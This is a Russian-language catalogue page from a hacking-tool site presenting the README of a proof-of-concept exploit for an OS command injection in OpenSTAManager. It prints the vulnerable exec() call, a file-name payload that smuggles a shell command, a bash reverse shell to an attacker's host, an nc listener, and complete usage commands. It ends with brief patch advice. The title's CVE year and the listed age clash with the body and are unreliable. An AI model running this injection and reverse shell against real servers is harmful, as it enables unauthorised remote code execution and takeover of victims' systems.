Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-69212 — Python poc, эксплойт для CVE-2025-69212 | Kitploit
Инструменты/GitHubGitHub/c0gnit00/cve-2026-69212
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеРазработка Полезной Нагрузки
GitHubc0gnit00/cve-2026-69212

CVE-2026-69212

Python poc, эксплойт для CVE-2025-69212

Репозиторий
222 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-69212 — OS Command Injection (RCE) в OpenSTAManager

Эксплойт Proof-of-concept для CVE-2025-69212 — уязвимости OS Command Injection в OpenSTAManager <= 2.9.8, которая позволяет аутентифицированному злоумышленнику выполнить произвольный код на сервере через специально созданную ZIP-архивную загрузку.

Advisory

  • CVE: CVE-2025-69212
  • GHSA: GHSA-25fp-8w8p-mx36
  • Затронутые версии: OpenSTAManager <= 2.9.8
  • Исправлено в: OpenSTAManager 2.9.9+
  • CVSS: Критический

Описание уязвимости

Уязвимость находится в src/Util/XML.php на строке ~100, где приложение передает контролируемое пользователем имя файла напрямую в вызов оболочки exec() без проверки:

root@kitploit:~
exec('openssl smime -verify -noverify -in "' . $file . '" -inform DER -out "' . $output_file . '"');

При загрузке ZIP-архива через плагин () приложение извлекает ZIP и передает имя файла каждой записи в . Злоумышленник может создать ZIP с вредоносным именем файла, которое выходит за пределы аргумента в двойных кавычках и внедряет произвольные команды оболочки.

importFE_ZIP
/actions.php
.p7m
exec()

Полезная нагрузка инъекции (имя файла):

root@kitploit:~
invoice.p7m";<COMMAND>;echo ".p7m

Результирующее выполнение в оболочке:

root@kitploit:~
openssl smime ... -in "invoice.p7m";<COMMAND>;echo ".p7m" ...
#                                   ^^^^^^^^^^^^ внедрено здесь

Примечание: Прямой слеш / не может появляться непосредственно в имени файла, так как ZipArchive::extractTo() воспринимает его как разделитель пути. PoC обходит это, кодируя полезную нагрузку reverse shell в base64.


Требования

  • Python 3.x
  • библиотека requests
  • Действительные учетные данные OpenSTAManager (любая роль с доступом к плагину импорта)
  • Слушатель на машине атакующего (например, nc)

Установка зависимостей:

root@kitploit:~
pip install requests

Использование

root@kitploit:~
python3 CVE-2025-69212.py -u <TARGET_URL> -U <USERNAME> -P <PASSWORD> --lhost <YOUR_IP> --lport <YOUR_PORT>

Параметры

АргументОбязательныйОписание
-u, --urlДаБазовый URL цели (например http://target.htb)
-U, --usernameДаИмя пользователя OpenSTAManager
-P, --passwordДаПароль OpenSTAManager
--lhostДаВаш IP-адрес для reverse shell
--lportДаВаш порт прослушивания для reverse shell
--proxyНетHTTP прокси (например http://127.0.0.1:8080)

Пример

root@kitploit:~
# Запуск слушателя
nc -lvnp 4444

# Запуск эксплойта
python3 CVE-2025-69212.py -u http://target.htb -U admin -P 'password' --lhost 10.10.14.5 --lport 4444

# Маршрутизация через Burp Suite
python3 CVE-2025-69212.py -u http://target.htb -U admin -P 'password' --lhost 10.10.14.5 --lport 4444 --proxy http://127.0.0.1:8080

Как это работает

  1. Аутентификация — Вход в OpenSTAManager с использованием предоставленных учетных данных
  2. Сборка полезной нагрузки — Создание ZIP-архива, содержащего файл .p7m, имя которого включает внедренную команду
  3. Кодирование в Base64 — Reverse shell (bash -i >& /dev/tcp/LHOST/LPORT 0>&1) кодируется в base64, чтобы избежать прямых слешей в имени файла
  4. Загрузка — Отправка POST-запроса с ZIP на /actions.php через плагин importFE_ZIP
  5. Выполнение — Сервер извлекает ZIP, передает вредоносное имя файла в exec(), что запускает reverse shell
  6. Многопоточность — Загрузка выполняется в фоновом потоке (daemon thread), так как bash удерживает HTTP-соединение открытым; скрипт завершается корректно, не дожидаясь ответа

Устранение

Обновление до OpenSTAManager 2.9.9 или новее, где имена файлов проверяются перед передачей в команды оболочки.

Если немедленное применение патча невозможно, отключите плагин importFE_ZIP или ограничьте доступ к /actions.php только доверенными пользователями.


Отказ от ответственности

Данный инструмент предназначен только для авторизованного тестирования безопасности и образовательных целей. Используйте только на системах, которые вам принадлежат или на тестирование которых у вас есть явное письменное разрешение. Несанкционированное использование против систем, которые вам не принадлежат, является незаконным и неэтичным. Автор не несет ответственности за любое неправильное использование или ущерб, причиненный этим инструментом.


Ссылки

  • GHSA-25fp-8w8p-mx36
  • OpenSTAManager GitHub
  • NVD - CVE-2025-69212
Скачать инструмент